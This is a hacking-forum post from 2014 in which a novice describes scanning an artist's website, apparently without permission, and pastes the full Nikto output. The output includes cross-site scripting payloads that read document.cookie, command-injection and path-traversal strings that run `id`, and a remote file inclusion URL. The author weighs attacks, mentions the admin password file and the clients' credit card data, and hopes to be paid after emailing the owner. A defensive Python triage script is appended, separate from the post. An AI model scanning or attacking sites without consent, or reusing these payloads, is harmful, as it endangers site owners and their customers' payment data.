My First Site Hack.

Mar 30, 2014 03:48 AM
Mar 30, 2014 04:14 AM

Hello peeps, instead of posting in comments I decided to post a new thread in the forum. This way it will be easier to keep it organised. Also this is a site for noobs, and sometimes it helps other noobs to see what other noobs are doing and the process they are going through to learn. I myself have been a teacher and have found that most people are afraid of asking questions for fear of looking stupid. Trust me, this is not a problem I have. OK, down to business:

I did recon on my victim and am pretty sure he is not hacking savvy, although he has skills with computers. With this information I decided to use Nikto, as I am sure he does not have an IDS (intrusion detection system such as Snort) in place. Now the web host might notice the scan, but I am pretty sure he won't. Nikto results listed below:

Server: Apache/2.2.26 (Unix) modssl/2.2.26 OpenSSL/1.0.1e-fips modauthpassthrough/2.1 modbwlimited/1.4 FrontPage/5.0.2.2635 modfcgid/2.3.6

  • Retrieved x-powered-by header: PHP/5.4.24
  • No CGI Directories found (use '-C all' to force check all possible dirs)
  • robots.txt contains 2 entries which should be manually viewed.
  • modssl/2.2.26 appears to be outdated (current is at least 2.8.31) (may depend on server version)
  • Number of sections in the version string differ from those in the database, the server reports: openssl/1.0.1e-fips while the database has: 1.0.0.100. This may cause false positives.
  • FrontPage/5.0.2.2635 appears to be outdated (current is at least 5.0.4.3) (may depend on server version)
  • DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
  • OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
  • FrontPage - http://www.insecure.org/sploits/Microsoft.frontpage.insecurities.html
  • modssl/2.2.26 OpenSSL/1.0.1e-fips modauthpassthrough/2.1 modbwlimited/1.4 FrontPage/5.0.2.2635 modfcgid/2.3.6 - modssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell (difficult to exploit). CVE-2002-0082, OSVDB-756.
  • OSVDB-44056: /sips/sipssys/users/a/admin/user: SIPS v0.2.2 allows user account info (including password) to be retrieved remotely.
  • /servlet/webacc?User.html=noexist: Netware web access may reveal full path of the web server. Apply vendor patch or upgrade.
  • OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • /modules.php?op=modload&name=FAQ&file=index&myfaq=yes&idcat=1&categories=%3Cimg%20src=javascript:alert(9456);%3E&parentid=0: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • /modules.php?letter=%22%3E%3Cimg%20src=javascript:alert(document.cookie);%3E&op=modload&name=MembersList&file=index: Post Nuke 0.7.2.3-Phoenix is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • OSVDB-2946: /forummembers.asp?find=%22;}alert(9823);function%20x(){v%20=%22: Web Wiz Forums ver. 7.01 and below is vulnerable to Cross Site Scripting (XSS). http://www.cert.org/advisories/CA-2000-02.html.
  • OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-12184: /some.php?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-12184: /some.php?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-12184: /some.php?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
  • OSVDB-3092: /cart/: This might be interesting...
  • OSVDB-3092: /members/: This might be interesting...
  • OSVDB-3092: /register/: This might be interesting...
  • OSVDB-3092: /shop/: This might be interesting...
  • OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
  • OSVDB-3092: /java-sys/: Default Java directory should not allow directory listing.
  • OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information.
  • OSVDB-3299: /forumscalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
  • OSVDB-3299: /forumzcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
  • OSVDB-3299: /htforumcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
  • OSVDB-3299: /vbcalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
  • OSVDB-3299: /vbulletincalendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22: Vbulletin allows remote command execution. See http://www.securiteam.com/securitynews/5IP0B203PI.html
  • OSVDB-724: /ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely. http://ans.gq.nu/ default admin string 'admin:aaLR8vE.jjhss:root@(i deleted this)', password file location 'ansdata/ans.passwd'
  • OSVDB-724: /ans/ans.pl?p=../../../../../usr/bin/id|&blah: Avenger's News System allows commands to be issued remotely.
  • OSVDB-3092: /xmlrpc.php: xmlrpc.php was found.
  • OSVDB-3092: /bo/: This might be interesting... potential country code (Bolivia)
  • OSVDB-5292: /info.php?file=http://cirt.net/rfiinc.txt?: RFI from RSnake's list (http://ha.ckers.org/weird/rfi-locations.dat) or from http://osvdb.org/
  • /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
  • OSVDB-3092: /license.txt: License file found may identify site software.
  • /wordpress/: A Wordpress installation was found.
  • 6448 items checked: 33 error(s) and 39 item(s) reported on remote host
  • End Time: 2014-03-30 14:50:10 (5524 seconds)

As you can see this guy's site is a mess; I even know where his admin pw location is. And btw this guy has a lot of wealthy clients (he's an artist, also much more successful than I am) and they buy from him, can you say credit card info? I also got all his PHP info.

I always like to start at the top of things, so what I am seeing is that TRACE is on, which is a hack that I can learn and exploit (already checked into XST), and a lot of potential for XSS hacks, not to mention he's running WordPress.

Full disclosure: I have already emailed the victim informing him that he has been pen tested, so I have no intention of actually hacking. I actually hope he contacts me for the information I gathered and I make a few bucks. I will post more in comments as I work on this site. I would ask for advice but I am noticing I never get any lol; experience is the great teacher, I agree.
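The Nikto findings quoted above are noisy (the tool itself warns that version-string mismatches "may cause false positives", and it reports vBulletin and Netware paths on an Apache/WordPress host), so whoever owns the site needs them grouped and ranked before fixing anything. The script below is an added example, not part of the original post and not Nikto's own code: it parses a constructed sample in Nikto's "+" line format, merges paths that share an OSVDB id and category, and attaches an Apache/PHP remediation hint. The category keywords, ranks and hints are the example's own assumptions.

```python
import re

# Constructed sample in the shape of the Nikto findings quoted in the post (not a live scan).
NIKTO_OUTPUT = """\
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3233: /info.php: PHP is installed, and a test script which runs phpinfo() was found.
+ OSVDB-3092: /img-sys/: Default image directory should not allow directory listing.
+ OSVDB-3092: /cart/: This might be interesting...
+ OSVDB-27071: /phpimageview.php?pic=javascript:alert(8754): PHP Image View 1.0 is vulnerable to Cross Site Scripting (XSS).
+ OSVDB-3299: /vbcalendar.php?calbirthdays=1: Vbulletin allows remote command execution.
+ OSVDB-3299: /vbulletincalendar.php?calbirthdays=1: Vbulletin allows remote command execution.
+ /wordpress/: A Wordpress installation was found.
"""
# id and path are optional; the path is matched non-greedily up to the first ': ' so a
# query string containing ':' (javascript:alert) stays inside the path.
LINE_RE = re.compile(r"^\+\s*(?:(?P<id>OSVDB-\d+):\s*)?(?:(?P<path>/.*?):\s+)?(?P<desc>.+)$")
# (category, fix-first rank, keywords). Nikto matches many "exploitable" classes on HTTP
# status codes alone, so every category carries a verify step in its hint.
CATEGORIES = [
    ("rce", 0, ("remote command execution", "commands to be issued")),
    ("xst", 1, ("trace method",)),
    ("xss", 1, ("cross site scripting",)),
    ("info-disclosure", 2, ("directory listing", "phpinfo", "reveals", "full path")),
    ("enumeration", 3, ("might be interesting", "was found")),
]
REMEDIATION = {  # Apache / PHP hardening hints per category (assumed defaults)
    "rce": "confirm the component is installed at all; vBulletin paths on a WordPress host are likely false positives",
    "xst": "TraceEnable off (httpd.conf), then re-run the scan to confirm",
    "xss": "confirm the component is installed; otherwise mark as false positive",
    "info-disclosure": "Options -Indexes; delete phpinfo() test scripts; expose_php = Off in php.ini",
    "enumeration": "check the path really exists, then restrict or remove it",
}

def classify(desc):
    """Return (category, rank) for one finding description; unknown text ranks last."""
    text = desc.lower()
    for name, rank, words in CATEGORIES:
        if any(w in text for w in words):
            return name, rank
    return "other", 4

def triage(output):
    """Parse Nikto '+' lines, merge paths sharing an OSVDB id and category, sort by rank."""
    groups = {}
    for line in output.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        category, rank = classify(m.group("desc"))
        key = (rank, m.group("id") or "-", category)
        groups.setdefault(key, []).append(m.group("path") or "(server-wide)")
    return [{"id": i, "category": c, "paths": p, "fix": REMEDIATION.get(c, "manual review")}
            for (r, i, c), p in sorted(groups.items())]
```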
